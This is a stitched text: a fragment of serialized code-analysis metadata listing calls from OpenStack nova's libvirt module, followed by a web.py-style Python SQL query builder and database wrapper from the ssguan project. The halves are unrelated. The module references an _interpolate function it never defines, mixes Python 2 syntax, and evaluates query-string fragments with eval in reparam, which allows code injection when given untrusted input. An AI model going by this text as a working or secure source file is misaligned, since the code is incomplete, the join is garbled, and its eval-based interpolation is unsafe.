nova.virt.libvirt import config as vconfig\n'), ((46765, 46793), 'oslo_utils.encodeutils.safe_encode', 'encodeutils.safe_encode', (['xml'], {}), '(xml)\n', (46788, 46793), False, 'from oslo_utils import encodeutils\n'), ((50324, 50361), 'os.path.exists', 'os.path.exists', (['SEV_KERNEL_PARAM_FILE'], {}), '(SEV_KERNEL_PARAM_FILE)\n', (50338, 50361), False, 'import os\n'), ((9534, 9576), 'nova.virt.event.LifecycleEvent', 'virtevent.LifecycleEvent', (['uuid', 'transition'], {}), '(uuid, transition)\n', (9558, 9576), True, 'from nova.virt import event as virtevent\n'), ((10426, 10487), 'nova.i18n._', '_', (['"""Can not handle authentication request for %d credentials"""'], {}), "('Can not handle authentication request for %d credentials')\n", (10427, 10487), False, 'from nova.i18n import _\n'), ((15818, 15844), 'eventlet.greenio.GreenSocket', 'greenio.GreenSocket', (['csock'], {}), '(csock)\n', (15837, 15844), False, 'from eventlet import greenio\n'), ((19992, 20024), 'nova.context.get_admin_context', 'nova_context.get_admin_context', ([], {}), '()\n', (20022, 20024), True, 'from nova import context as nova_context\n'), ((20215, 20302), 'nova.compute.utils.notify_about_libvirt_connect_error', 'compute_utils.notify_about_libvirt_connect_error', (['ctxt'], {'ip': 'CONF.my_ip', 'exception': 'ex'}), '(ctxt, ip=CONF.my_ip,\n exception=ex)\n', (20263, 20302), True, 'from nova.compute import utils as compute_utils\n'), ((20334, 20367), 'nova.exception.HypervisorUnavailable', 'exception.HypervisorUnavailable', ([], {}), '()\n', (20365, 20367), False, 'from nova import exception\n'), ((24144, 24172), 'nova.exception.InternalError', 'exception.InternalError', (['msg'], {}), '(msg)\n', (24167, 24172), False, 'from nova import exception\n'), ((35256, 35300), 'nova.virt.libvirt.utils.get_default_machine_type', 'libvirt_utils.get_default_machine_type', (['arch'], {}), '(arch)\n', (35294, 35300), True, 'from nova.virt.libvirt import utils as libvirt_utils\n'), ((13188, 13223), 'nova.i18n._', '_', (['"""Connection to libvirt lost: %s"""'], {}), "('Connection to libvirt lost: %s')\n", (13189, 13223), False, 'from nova.i18n import _\n'), ((18402, 18433), 'nova.i18n._', '_', (['"""Connection to libvirt lost"""'], {}), "('Connection to libvirt lost')\n", (18403, 18433), False, 'from nova.i18n import _\n'), ((21578, 21621), 'oslo_utils.versionutils.convert_version_to_int', 'versionutils.convert_version_to_int', (['lv_ver'], {}), '(lv_ver)\n', (21613, 21621), False, 'from oslo_utils import versionutils\n'), ((21812, 21855), 'oslo_utils.versionutils.convert_version_to_int', 'versionutils.convert_version_to_int', (['hv_ver'], {}), '(hv_ver)\n', (21847, 21855), False, 'from oslo_utils import versionutils\n'), ((23802, 23855), 'nova.exception.InstanceNotFound', 'exception.InstanceNotFound', ([], {'instance_id': 'instance.uuid'}), '(instance_id=instance.uuid)\n', (23828, 23855), False, 'from nova import exception\n'), ((23876, 23975), 'nova.i18n._', '_', (['"""Error from libvirt while looking up %(instance_name)s: [Error Code %(error_code)s] %(ex)s"""'], {}), "('Error from libvirt while looking up %(instance_name)s: [Error Code %(error_code)s] %(ex)s'\n )\n", (23877, 23975), False, 'from nova.i18n import _\n'), ((41195, 41222), 'nova.i18n._', '_', (['"""Invalid usage_type: %s"""'], {}), "('Invalid usage_type: %s')\n", (41196, 41222), False, 'from nova.i18n import _\n'), ((41241, 41282), 'nova.exception.InternalError', 'exception.InternalError', (['(msg % usage_type)'], {}), '(msg % usage_type)\n', (41264, 41282), False, 'from nova import exception\n'), ((43087, 43124), 'oslo_utils.excutils.save_and_reraise_exception', 'excutils.save_and_reraise_exception', ([], {}), '()\n', (43122, 43124), False, 'from oslo_utils import excutils\n'), ((20037, 20064), 'nova.rpc.get_notifier', 'rpc.get_notifier', (['"""compute"""'], {}), "('compute')\n", (20053, 20064), False, 'from nova import rpc\n'), ((28399, 28425), 'nova.virt.libvirt.config.LibvirtConfigCPU', 'vconfig.LibvirtConfigCPU', ([], {}), '()\n', (28423, 28425), True, 'from nova.virt.libvirt import config as vconfig\n'), ((42658, 42685), 'nova.i18n._', '_', (['"""Invalid usage_type: %s"""'], {}), "('Invalid usage_type: %s')\n", (42659, 42685), False, 'from nova.i18n import _\n'), ((42704, 42745), 'nova.exception.InternalError', 'exception.InternalError', (['(msg % usage_type)'], {}), '(msg % usage_type)\n', (42727, 42745), False, 'from nova import exception\n'), ((8532, 8556), 'nova.virt.libvirt.guest.Guest', 'libvirt_guest.Guest', (['dom'], {}), '(dom)\n', (8551, 8556), True, 'from nova.virt.libvirt import guest as libvirt_guest\n'), ((18703, 18740), 'oslo_utils.excutils.save_and_reraise_exception', 'excutils.save_and_reraise_exception', ([], {}), '()\n', (18738, 18740), False, 'from oslo_utils import excutils\n'), ((8808, 8877), 'nova.virt.libvirt.migration.find_job_type', 'libvirt_migrate.find_job_type', (['guest'], {'instance': 'None', 'logging_ok': '(False)'}), '(guest, instance=None, logging_ok=False)\n', (8837, 8877), True, 'from nova.virt.libvirt import migration as libvirt_migrate\n'), ((19216, 19258), 'nova.i18n._', '_', (['"""Failed to connect to libvirt: %(msg)s"""'], {}), "('Failed to connect to libvirt: %(msg)s')\n", (19217, 19258), False, 'from nova.i18n import _\n')] |
# -*- coding: utf-8 -*-
# Copyright 2015 www.suishouguan.com
#
# Licensed under the Private License (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://github.com/samuelbaizg/ssguan/blob/master/LICENSE
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
import sys
import time
from ssguan.ignitor.base.struct import ThreadedDict, Storage
from ssguan.ignitor.base.struct import iters, IterBetter
__all__ = [
"UnknownParamstyle", "UnknownDB", "TransactionError",
"sqllist", "sqlors", "reparam", "sqlquote",
"SQLQuery", "SQLParam", "sqlparam",
"SQLLiteral", "sqlliteral",
"database", 'DB',
]
try:
import datetime
except ImportError:
datetime = None
debug = sys.stderr
config = Storage()
class UnknownDB(Exception):
"""raised for unsupported dbms"""
pass
class _ItplError(ValueError):
def __init__(self, text, pos):
ValueError.__init__(self)
self.text = text
self.pos = pos
def __str__(self):
return "unfinished expression in %s at char %d" % (
repr(self.text), self.pos)
class TransactionError(Exception): pass
class UnknownParamstyle(Exception):
"""
raised for unsupported db paramstyles
(currently supported: qmark, numeric, format, pyformat)
"""
pass
class SQLParam(object):
"""
Parameter in SQLQuery.
>>> q = SQLQuery(["SELECT * FROM test WHERE name=", SQLParam("joe")])
>>> q
<sql: "SELECT * FROM test WHERE name='joe'">
>>> q.query()
'SELECT * FROM test WHERE name=%s'
>>> q.values()
['joe']
"""
__slots__ = ["value"]
def __init__(self, value):
self.value = value
def get_marker(self, paramstyle='pyformat'):
if paramstyle == 'qmark':
return '?'
elif paramstyle == 'numeric':
return ':1'
elif paramstyle is None or paramstyle in ['format', 'pyformat']:
return '%s'
raise UnknownParamstyle(paramstyle)
def sqlquery(self):
return SQLQuery([self])
def __add__(self, other):
return self.sqlquery() + other
def __radd__(self, other):
return other + self.sqlquery()
def __str__(self):
return str(self.value)
def __repr__(self):
return '<param: %s>' % repr(self.value)
sqlparam = SQLParam
class SQLQuery(object):
"""
You can pass this sort of thing as a clause in any db function.
Otherwise, you can pass a dictionary to the keyword argument `args`
and the function will call reparam for you.
Internally, consists of `items`, which is a list of strings and
SQLParams, which get concatenated to produce the actual query.
"""
__slots__ = ["items"]
# tested in sqlquote's docstring
def __init__(self, items=None):
r"""Creates a new SQLQuery.
>>> SQLQuery("x")
<sql: 'x'>
>>> q = SQLQuery(['SELECT * FROM ', 'test', ' WHERE x=', SQLParam(1)])
>>> q
<sql: 'SELECT * FROM test WHERE x=1'>
>>> q.query(), q.values()
('SELECT * FROM test WHERE x=%s', [1])
>>> SQLQuery(SQLParam(1))
<sql: '1'>
"""
if items is None:
self.items = []
elif isinstance(items, list):
self.items = items
elif isinstance(items, SQLParam):
self.items = [items]
elif isinstance(items, SQLQuery):
self.items = list(items.items)
else:
self.items = [items]
# Take care of SQLLiterals
for i, item in enumerate(self.items):
if isinstance(item, SQLParam) and isinstance(item.value, SQLLiteral):
self.items[i] = item.value.v
def append(self, value):
self.items.append(value)
def __add__(self, other):
if isinstance(other, str):
items = [other]
elif isinstance(other, SQLQuery):
items = other.items
else:
return NotImplemented
return SQLQuery(self.items + items)
def __radd__(self, other):
if isinstance(other, str):
items = [other]
else:
return NotImplemented
return SQLQuery(items + self.items)
def __iadd__(self, other):
if isinstance(other, (str, SQLParam)):
self.items.append(other)
elif isinstance(other, SQLQuery):
self.items.extend(other.items)
else:
return NotImplemented
return self
def __len__(self):
return len(self.query())
def query(self, paramstyle=None):
"""
Returns the query part of the sql query.
>>> q = SQLQuery(["SELECT * FROM test WHERE name=", SQLParam('joe')])
>>> q.query()
'SELECT * FROM test WHERE name=%s'
>>> q.query(paramstyle='qmark')
'SELECT * FROM test WHERE name=?'
"""
s = []
for x in self.items:
if isinstance(x, SQLParam):
x = x.get_marker(paramstyle)
s.append(x)
else:
# automatically escape % characters in the query
# For backward compatability, ignore escaping when the query looks already escaped
if paramstyle in ['format', 'pyformat']:
if '%' in x and '%%' not in x:
x = x.replace('%', '%%')
s.append(x)
return "".join(s)
def values(self):
"""
Returns the values of the parameters used in the sql query.
>>> q = SQLQuery(["SELECT * FROM test WHERE name=", SQLParam('joe')])
>>> q.values()
['joe']
"""
return [i.value for i in self.items if isinstance(i, SQLParam)]
def join(items, sep=' ', prefix=None, suffix=None, target=None):
"""
Joins multiple queries.
>>> SQLQuery.join(['a', 'b'], ', ')
<sql: 'a, b'>
Optinally, prefix and suffix arguments can be provided.
>>> SQLQuery.join(['a', 'b'], ', ', prefix='(', suffix=')')
<sql: '(a, b)'>
If target argument is provided, the items are appended to target instead of creating a new SQLQuery.
"""
if target is None:
target = SQLQuery()
target_items = target.items
if prefix:
target_items.append(prefix)
for i, item in enumerate(items):
if i != 0:
target_items.append(sep)
if isinstance(item, SQLQuery):
target_items.extend(item.items)
else:
target_items.append(item)
if suffix:
target_items.append(suffix)
return target
join = staticmethod(join)
def _str(self):
try:
return self.query() % tuple([sqlify(x) for x in self.values()])
except (ValueError, TypeError):
return self.query()
def __str__(self):
return self._str()
def __repr__(self):
return '<sql: %s>' % repr(str(self))
class SQLLiteral:
"""
Protects a string from `sqlquote`.
>>> sqlquote('NOW()')
<sql: "'NOW()'">
>>> sqlquote(SQLLiteral('NOW()'))
<sql: 'NOW()'>
"""
def __init__(self, v):
self.v = v
def __repr__(self):
return self.v
sqlliteral = SQLLiteral
def _sqllist(values):
"""
>>> _sqllist([1, 2, 3])
<sql: '(1, 2, 3)'>
"""
items = []
items.append('(')
for i, v in enumerate(values):
if i != 0:
items.append(', ')
items.append(sqlparam(v))
items.append(')')
return SQLQuery(items)
def reparam(string_, dictionary):
"""
Takes a string and a dictionary and interpolates the string
using values from the dictionary. Returns an `SQLQuery` for the result.
>>> reparam("s = $s", dict(s=True))
<sql: "s = 't'">
>>> reparam("s IN $s", dict(s=[1, 2]))
<sql: 's IN (1, 2)'>
"""
dictionary = dictionary.copy() # eval mucks with it
result = []
for live, chunk in _interpolate(string_):
if live:
v = eval(chunk, dictionary)
result.append(sqlquote(v))
else:
result.append(chunk)
return SQLQuery.join(result, '')
def sqlify(obj):
"""
converts `obj` to its proper SQL version
>>> sqlify(None)
'NULL'
>>> sqlify(True)
"'t'"
>>> sqlify(3)
'3'
"""
# because `1 == True and hash(1) == hash(True)`
# we have to do this the hard way...
if obj is None:
return 'NULL'
elif obj is True:
return "'t'"
elif obj is False:
return "'f'"
elif datetime and isinstance(obj, datetime.datetime):
return repr(obj.isoformat())
else:
return repr(obj)
def sqllist(lst):
"""
Converts the arguments for use in something like a WHERE clause.
>>> sqllist(['a', 'b'])
'a, b'
>>> sqllist('a')
'a'
>>> sqllist(u'abc')
u'abc'
"""
if isinstance(lst, str):
return lst
else:
return ', '.join(lst)
def sqlors(left, lst):
"""
`left is a SQL clause like `tablename.arg = `
and `lst` is a list of values. Returns a reparam-style
pair featuring the SQL that ORs together the clause
for each item in the lst.
>>> sqlors('foo = ', [])
<sql: '1=2'>
>>> sqlors('foo = ', [1])
<sql: 'foo = 1'>
>>> sqlors('foo = ', 1)
<sql: 'foo = 1'>
>>> sqlors('foo = ', [1,2,3])
<sql: '(foo = 1 OR foo = 2 OR foo = 3 OR 1=2)'>
"""
if isinstance(lst, iters):
lst = list(lst)
ln = len(lst)
if ln == 0:
return SQLQuery("1=2")
if ln == 1:
lst = lst[0]
if isinstance(lst, iters):
return SQLQuery(['('] +
sum([[left, sqlparam(x), ' OR '] for x in lst], []) +
['1=2)']
)
else:
return left + sqlparam(lst)
def sqlwhere(dictionary, grouping=' AND '):
"""
Converts a `dictionary` to an SQL WHERE clause `SQLQuery`.
>>> sqlwhere({'cust_id': 2, 'order_id':3})
<sql: 'order_id = 3 AND cust_id = 2'>
>>> sqlwhere({'cust_id': 2, 'order_id':3}, grouping=', ')
<sql: 'order_id = 3, cust_id = 2'>
>>> sqlwhere({'a': 'a', 'b': 'b'}).query()
'a = %s AND b = %s'
"""
return SQLQuery.join([k + ' = ' + sqlparam(v) for k, v in dictionary.items()], grouping)
def sqlquote(a):
"""
Ensures `a` is quoted properly for use in a SQL query.
>>> 'WHERE x = ' + sqlquote(True) + ' AND y = ' + sqlquote(3)
<sql: "WHERE x = 't' AND y = 3">
>>> 'WHERE x = ' + sqlquote(True) + ' AND y IN ' + sqlquote([2, 3])
<sql: "WHERE x = 't' AND y IN (2, 3)">
"""
if isinstance(a, list):
return _sqllist(a)
else:
return sqlparam(a).sqlquery()
class Transaction:
"""Database transaction."""
def __init__(self, ctx):
self.ctx = ctx
self.transaction_count = transaction_count = len(ctx.transactions)
class transaction_engine:
"""Transaction Engine used in top level transactions."""
def do_transact(self):
ctx.commit(unload=False)
def do_commit(self):
ctx.commit()
def do_rollback(self):
ctx.rollback()
class subtransaction_engine:
"""Transaction Engine used in sub transactions."""
def query(self, q):
db_cursor = ctx.db.cursor()
ctx.db_execute(db_cursor, SQLQuery(q % transaction_count))
def do_transact(self):
self.query('SAVEPOINT webpy_sp_%s')
def do_commit(self):
self.query('RELEASE SAVEPOINT webpy_sp_%s')
def do_rollback(self):
self.query('ROLLBACK TO SAVEPOINT webpy_sp_%s')
class dummy_engine:
"""Transaction Engine used instead of subtransaction_engine
when sub transactions are not supported."""
do_transact = do_commit = do_rollback = lambda self: None
if self.transaction_count:
# nested transactions are not supported in some databases
if self.ctx.get('ignore_nested_transactions'):
self.engine = dummy_engine()
else:
self.engine = subtransaction_engine()
else:
self.engine = transaction_engine()
self.engine.do_transact()
self.ctx.transactions.append(self)
def __enter__(self):
return self
def __exit__(self, exctype, excvalue, traceback):
if exctype is not None:
self.rollback()
else:
self.commit()
def commit(self):
if len(self.ctx.transactions) > self.transaction_count:
self.engine.do_commit()
self.ctx.transactions = self.ctx.transactions[:self.transaction_count]
def rollback(self):
if len(self.ctx.transactions) > self.transaction_count:
self.engine.do_rollback()
self.ctx.transactions = self.ctx.transactions[:self.transaction_count]
class DB:
"""Database"""
def __init__(self, db_module, keywords):
"""Creates a database.
"""
# some DB implementaions take optional paramater `driver` to use a specific driver modue
# but it should not be passed to connect
keywords.pop('driver', None)
self.db_module = db_module
self.keywords = keywords
self._ctx = ThreadedDict()
# flag to enable/disable printing queries
self.printing = config.get('debug_sql', config.get('debug', False))
self.supports_multiple_insert = False
# enable pooling if DBUtils module is available.
self.has_pooling = True
# Pooling can be disabled by passing pooling=False in the keywords.
self.has_pooling = self.keywords.pop('pooling', True) and self.has_pooling
def _getctx(self):
if not self._ctx.get('db'):
self._load_context(self._ctx)
return self._ctx
ctx = property(_getctx)
def _load_context(self, ctx):
ctx.dbq_count = 0
ctx.transactions = [] # stack of transactions
if self.has_pooling:
ctx.db = self._connect_with_pooling(self.keywords)
else:
ctx.db = self._connect(self.keywords)
ctx.db_execute = self._db_execute
if not hasattr(ctx.db, 'commit'):
ctx.db.commit = lambda: None
if not hasattr(ctx.db, 'rollback'):
ctx.db.rollback = lambda: None
def commit(unload=True):
# do db commit and release the connection if pooling is enabled.
ctx.db.commit()
if unload and self.has_pooling:
self._unload_context(self._ctx)
def rollback():
# do db rollback and release the connection if pooling is enabled.
ctx.db.rollback()
if self.has_pooling:
self._unload_context(self._ctx)
ctx.commit = commit
ctx.rollback = rollback
def _unload_context(self, ctx):
del ctx.db
def _connect(self, keywords):
return self.db_module.connect(**keywords)
def _connect_with_pooling(self, keywords):
def get_pooled_db():
from DBUtils import PooledDB
# In DBUtils 0.9.3, `dbapi` argument is renamed as `creator`
# see Bug#122112
if PooledDB.__version__.split('.') < '0.9.3'.split('.'):
return PooledDB.PooledDB(dbapi=self.db_module, **keywords)
else:
return PooledDB.PooledDB(creator=self.db_module, **keywords)
if getattr(self, '_pooleddb', None) is None:
self._pooleddb = get_pooled_db()
return self._pooleddb.connection()
def _db_cursor(self):
return self.ctx.db.cursor()
def _param_marker(self):
"""Returns parameter marker based on paramstyle attribute if this database."""
style = getattr(self, 'paramstyle', 'pyformat')
if style == 'qmark':
return '?'
elif style == 'numeric':
return ':1'
elif style in ['format', 'pyformat']:
return '%s'
raise UnknownParamstyle(style)
def _db_execute(self, cur, sql_query):
"""executes an sql query"""
self.ctx.dbq_count += 1
try:
a = time.time()
query, params = self._process_query(sql_query)
out = cur.execute(query, params)
b = time.time()
except:
if self.printing:
print >> debug, 'ERR:', str(sql_query)
if self.ctx.transactions:
self.ctx.transactions[-1].rollback()
else:
self.ctx.rollback()
raise
if self.printing:
print >> debug, '%s (%s): %s' % (round(b - a, 2), self.ctx.dbq_count, str(sql_query))
return out
def _process_query(self, sql_query):
"""Takes the SQLQuery object and returns query string and parameters.
"""
paramstyle = getattr(self, 'paramstyle', 'pyformat')
query = sql_query.query(paramstyle)
params = sql_query.values()
return query, params
def _where(self, where, args):
if isinstance(where, (int)):
where = "id = " + sqlparam(where)
#@@@ for backward-compatibility
elif isinstance(where, (list, tuple)) and len(where) == 2:
where = SQLQuery(where[0], where[1])
elif isinstance(where, SQLQuery):
pass
else:
where = reparam(where, args)
return where
def query(self, sql_query, args=None, processed=False, _test=False):
"""
Execute SQL query `sql_query` using dictionary `args` to interpolate it.
If `processed=True`, `args` is a `reparam`-style list to use
instead of interpolating.
>>> db = DB(None, {})
>>> db.query("SELECT * FROM foo", _test=True)
<sql: 'SELECT * FROM foo'>
>>> db.query("SELECT * FROM foo WHERE x = $x", args=dict(x='f'), _test=True)
<sql: "SELECT * FROM foo WHERE x = 'f'">
>>> db.query("SELECT * FROM foo WHERE x = " + sqlquote('f'), _test=True)
<sql: "SELECT * FROM foo WHERE x = 'f'">
"""
if args is None: args = {}
if not processed and not isinstance(sql_query, SQLQuery):
sql_query = reparam(sql_query, args)
if _test: return sql_query
db_cursor = self._db_cursor()
self._db_execute(db_cursor, sql_query)
if db_cursor.description:
names = [x[0] for x in db_cursor.description]
def iterwrapper():
row = db_cursor.fetchone()
while row:
yield Storage(dict(zip(names, row)))
row = db_cursor.fetchone()
out = IterBetter(iterwrapper())
out.__len__ = lambda: int(db_cursor.rowcount)
out.list = lambda: [Storage(dict(zip(names, x))) \
for x in db_cursor.fetchall()]
else:
out = db_cursor.rowcount
if not self.ctx.transactions:
self.ctx.commit()
return out
def select(self, tables, args=None, what='*', where=None, order=None, group=None,
limit=None, offset=None, _test=False):
"""
Selects `what` from `tables` with clauses `where`, `order`,
`group`, `limit`, and `offset`. Uses args to interpolate.
Otherwise, each clause can be a SQLQuery.
>>> db = DB(None, {})
>>> db.select('foo', _test=True)
<sql: 'SELECT * FROM foo'>
>>> db.select(['foo', 'bar'], where="foo.bar_id = bar.id", limit=5, _test=True)
<sql: 'SELECT * FROM foo, bar WHERE foo.bar_id = bar.id LIMIT 5'>
"""
if args is None: args = {}
sql_clauses = self.sql_clauses(what, tables, where, group, order, limit, offset)
clauses = [self.gen_clause(sql, val, args) for sql, val in sql_clauses if val is not None]
qout = SQLQuery.join(clauses)
if _test: return qout
return self.query(qout, processed=True)
def where(self, table, what='*', order=None, group=None, limit=None,
offset=None, _test=False, **kwargs):
"""
Selects from `table` where keys are equal to values in `kwargs`.
>>> db = DB(None, {})
>>> db.where('foo', bar_id=3, _test=True)
<sql: 'SELECT * FROM foo WHERE bar_id = 3'>
>>> db.where('foo', source=2, crust='dewey', _test=True)
<sql: "SELECT * FROM foo WHERE source = 2 AND crust = 'dewey'">
>>> db.where('foo', _test=True)
<sql: 'SELECT * FROM foo'>
"""
where_clauses = []
for k, v in kwargs.iteritems():
where_clauses.append(k + ' = ' + sqlquote(v))
if where_clauses:
where = SQLQuery.join(where_clauses, " AND ")
else:
where = None
return self.select(table, what=what, order=order,
group=group, limit=limit, offset=offset, _test=_test,
where=where)
def sql_clauses(self, what, tables, where, group, order, limit, offset):
return (
('SELECT', what),
('FROM', sqllist(tables)),
('WHERE', where),
('GROUP BY', group),
('ORDER BY', order),
('LIMIT', limit),
('OFFSET', offset))
def gen_clause(self, sql, val, args):
if isinstance(val, (int)):
if sql == 'WHERE':
nout = 'id = ' + sqlquote(val)
else:
nout = SQLQuery(val)
#@@@
elif isinstance(val, (list, tuple)) and len(val) == 2:
nout = SQLQuery(val[0], val[1]) # backwards-compatibility
elif isinstance(val, SQLQuery):
nout = val
else:
nout = reparam(val, args)
def xjoin(a, b):
if a and b: return a + ' ' + b
else: return a or b
return xjoin(sql, nout)
def insert(self, tablename, seqname=None, _test=False, **values):
"""
Inserts `values` into `tablename`. Returns current sequence ID.
Set `seqname` to the ID if it's not the default, or to `False`
if there isn't one.
>>> db = DB(None, {})
>>> q = db.insert('foo', name='bob', age=2, created=SQLLiteral('NOW()'), _test=True)
>>> q
<sql: "INSERT INTO foo (age, name, created) VALUES (2, 'bob', NOW())">
>>> q.query()
'INSERT INTO foo (age, name, created) VALUES (%s, %s, NOW())'
>>> q.values()
[2, 'bob']
"""
def q(x): return "(" + x + ")"
if values:
_keys = SQLQuery.join(values.keys(), ', ')
_values = SQLQuery.join([sqlparam(v) for v in values.values()], ', ')
sql_query = "INSERT INTO %s " % tablename + q(_keys) + ' VALUES ' + q(_values)
else:
sql_query = SQLQuery(self._get_insert_default_values_query(tablename))
if _test: return sql_query
db_cursor = self._db_cursor()
if seqname is not False:
sql_query = self._process_insert_query(sql_query, tablename, seqname)
if isinstance(sql_query, tuple):
# for some databases, a separate query has to be made to find
# the id of the inserted row.
q1, q2 = sql_query
self._db_execute(db_cursor, q1)
self._db_execute(db_cursor, q2)
else:
self._db_execute(db_cursor, sql_query)
try:
out = db_cursor.fetchone()[0]
except Exception:
out = None
if not self.ctx.transactions:
self.ctx.commit()
return out
def _get_insert_default_values_query(self, table):
return "INSERT INTO %s DEFAULT VALUES" % table
def multiple_insert(self, tablename, values, seqname=None, _test=False):
"""
Inserts multiple rows into `tablename`. The `values` must be a list of dictioanries,
one for each row to be inserted, each with the same set of keys.
Returns the list of ids of the inserted rows.
Set `seqname` to the ID if it's not the default, or to `False`
if there isn't one.
>>> db = DB(None, {})
>>> db.supports_multiple_insert = True
>>> values = [{"name": "foo", "email": "<EMAIL>"}, {"name": "bar", "email": "<EMAIL>"}]
>>> db.multiple_insert('person', values=values, _test=True)
<sql: "INSERT INTO person (name, email) VALUES ('foo', '<EMAIL>'), ('bar', '<EMAIL>')">
"""
if not values:
return []
if not self.supports_multiple_insert:
out = [self.insert(tablename, seqname=seqname, _test=_test, **v) for v in values]
if seqname is False:
return None
else:
return out
keys = values[0].keys()
# @@ make sure all keys are valid
# make sure all rows have same keys.
for v in values:
if v.keys() != keys:
raise ValueError('Bad data')
sql_query = SQLQuery('INSERT INTO %s (%s) VALUES ' % (tablename, ', '.join(keys)))
for i, row in enumerate(values):
if i != 0:
sql_query.append(", ")
SQLQuery.join([SQLParam(row[k]) for k in keys], sep=", ", target=sql_query, prefix="(", suffix=")")
if _test: return sql_query
db_cursor = self._db_cursor()
if seqname is not False:
sql_query = self._process_insert_query(sql_query, tablename, seqname)
if isinstance(sql_query, tuple):
# for some databases, a separate query has to be made to find
# the id of the inserted row.
q1, q2 = sql_query
self._db_execute(db_cursor, q1)
self._db_execute(db_cursor, q2)
else:
self._db_execute(db_cursor, sql_query)
try:
out = db_cursor.fetchone()[0]
out = range(out - len(values) + 1, out + 1)
except Exception:
out = None
if not self.ctx.transactions:
self.ctx.commit()
return out
def update(self, tables, where, args=None, _test=False, **values):
"""
Update `tables` with clause `where` (interpolated using `args`)
and setting `values`.
>>> db = DB(None, {})
>>> name = 'Joseph'
>>> q = db.update('foo', where='name = $name', name='bob', age=2,
... created=SQLLiteral('NOW()'), args=locals(), _test=True)
>>> q
<sql: "UPDATE foo SET age = 2, name = 'bob', created = NOW() WHERE name = 'Joseph'">
>>> q.query()
'UPDATE foo SET age = %s, name = %s, created = NOW() WHERE name = %s'
>>> q.values()
[2, 'bob', 'Joseph']
"""
if args is None: args = {}
where = self._where(where, args)
query = (
"UPDATE " + sqllist(tables) +
" SET " + sqlwhere(values, ', ') +
" WHERE " + where)
if _test: return query
db_cursor = self._db_cursor()
self._db_execute(db_cursor, query)
if not self.ctx.transactions:
self.ctx.commit()
return db_cursor.rowcount
def delete(self, table, where, using=None, args=None, _test=False):
"""
Deletes from `table` with clauses `where` and `using`.
>>> db = DB(None, {})
>>> name = 'Joe'
>>> db.delete('foo', where='name = $name', args=locals(), _test=True)
<sql: "DELETE FROM foo WHERE name = 'Joe'">
"""
if args is None: args = {}
where = self._where(where, args)
q = 'DELETE FROM ' + table
if using: q += ' USING ' + sqllist(using)
if where: q += ' WHERE ' + where
if _test: return q
db_cursor = self._db_cursor()
self._db_execute(db_cursor, q)
if not self.ctx.transactions:
self.ctx.commit()
return db_cursor.rowcount
def _process_insert_query(self, query, tablename, seqname):
return query
def transaction(self):
"""Start a transaction."""
return Transaction(self.ctx)
class MySQLDB(DB):
def __init__(self, **keywords):
import MySQLdb as db
if 'pw' in keywords:
keywords['passwd'] = keywords['pw']
del keywords['pw']
if 'charset' not in keywords:
keywords['charset'] = 'utf8'
elif keywords['charset'] is None:
del keywords['charset']
self.paramstyle = db.paramstyle = 'pyformat' # it's both, like psycopg
self.dbname = "mysql"
DB.__init__(self, db, keywords)
self.supports_multiple_insert = True
def _process_insert_query(self, query, tablename, seqname):
return query, SQLQuery('SELECT last_insert_id();')
def _get_insert_default_values_query(self, table):
return "INSERT INTO %s () VALUES()" % table
def import_driver(drivers, preferred=None):
"""Import the first available driver or preferred driver.
"""
if preferred:
drivers = [preferred]
for d in drivers:
try:
return __import__(d, None, None, ['x'])
except ImportError:
pass
raise ImportError("Unable to import " + " or ".join(drivers))
class SqliteDB(DB):
def __init__(self, **keywords):
db = import_driver(["sqlite3", "pysqlite2.dbapi2", "sqlite"], preferred=keywords.pop('driver', None))
if db.__name__ in ["sqlite3", "pysqlite2.dbapi2"]:
db.paramstyle = 'qmark'
# sqlite driver doesn't create datatime objects for timestamp columns unless `detect_types` option is passed.
# It seems to be supported in sqlite3 and pysqlite2 drivers, not surte about sqlite.
keywords.setdefault('detect_types', db.PARSE_DECLTYPES)
self.paramstyle = db.paramstyle
keywords['database'] = keywords.pop('db')
keywords['pooling'] = False # sqlite don't allows connections to be shared by threads
self.dbname = "sqlite"
DB.__init__(self, db, keywords)
def _process_insert_query(self, query, tablename, seqname):
return query, SQLQuery('SELECT last_insert_rowid();')
def query(self, *a, **kw):
out = DB.query(self, *a, **kw)
if isinstance(out, IterBetter):
del out.__len__
return out
# class PostgresDB(DB):
# """Postgres driver."""
# def __init__(self, **keywords):
# if 'pw' in keywords:
# keywords['password'] = keywords.pop('pw')
#
# db_module = import_driver(["psycopg2", "psycopg", "pgdb"], preferred=keywords.pop('driver', None))
# if db_module.__name__ == "psycopg2":
# import psycopg2.extensions
# psycopg2.extensions.register_type(psycopg2.extensions.UNICODE)
#
# # if db is not provided postgres driver will take it from PGDATABASE environment variable
# if 'db' in keywords:
# keywords['database'] = keywords.pop('db')
#
# self.dbname = "postgres"
# self.paramstyle = db_module.paramstyle
# DB.__init__(self, db_module, keywords)
# self.supports_multiple_insert = True
# self._sequences = None
#
# def _process_insert_query(self, query, tablename, seqname):
# if seqname is None:
# # when seqname is not provided guess the seqname and make sure it exists
# seqname = tablename + "_id_seq"
# if seqname not in self._get_all_sequences():
# seqname = None
#
# if seqname:
# query += "; SELECT currval('%s')" % seqname
#
# return query
#
# def _get_all_sequences(self):
# """Query postgres to find names of all sequences used in this database."""
# if self._sequences is None:
# q = "SELECT c.relname FROM pg_class c WHERE c.relkind = 'S'"
# self._sequences = set([c.relname for c in self.query(q)])
# return self._sequences
#
# def _connect(self, keywords):
# conn = DB._connect(self, keywords)
# try:
# conn.set_client_encoding('UTF8')
# except AttributeError:
# # fallback for pgdb driver
# conn.cursor().execute("set client_encoding to 'UTF-8'")
# return conn
#
# def _connect_with_pooling(self, keywords):
# conn = DB._connect_with_pooling(self, keywords)
# conn._con._con.set_client_encoding('UTF8')
# return conn
# class OracleDB(DB):
# def __init__(self, **keywords):
# import cx_Oracle as db
# if 'pw' in keywords:
# keywords['password'] = keywords.pop('pw')
#
# # @@ TODO: use db.makedsn if host, port is specified
# keywords['dsn'] = keywords.pop('db')
# self.dbname = 'oracle'
# db.paramstyle = 'numeric'
# self.paramstyle = db.paramstyle
#
# # oracle doesn't support pooling
# keywords.pop('pooling', None)
# DB.__init__(self, db, keywords)
#
# def _process_insert_query(self, query, tablename, seqname):
# if seqname is None:
# # It is not possible to get seq name from table name in Oracle
# return query
# else:
# return query + "; SELECT %s.currval FROM dual" % seqname
